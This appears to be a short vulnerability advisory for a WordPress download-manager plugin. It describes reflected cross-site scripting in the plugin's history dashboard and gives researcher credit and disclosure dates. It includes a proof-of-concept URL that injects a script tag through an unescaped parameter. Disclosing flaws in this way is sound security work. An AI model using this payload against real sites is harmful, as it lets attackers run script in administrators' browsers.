The plugin does not escape a generated URL before outputting it back in an attribute of the history dashboard, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/edit.php?post_type=wpdmpro&page=wpdm-stats&type=history&user_ids[]=1&"><script>alert(/XSS/)</script>
ZhongFu Su(JrXnm) of WuHan University
ZhongFu Su(JrXnm) of WuHan University
Yes
2022-06-27 (about 7 months ago)
2022-06-27 (about 7 months ago)
2022-09-26 (about 4 months ago)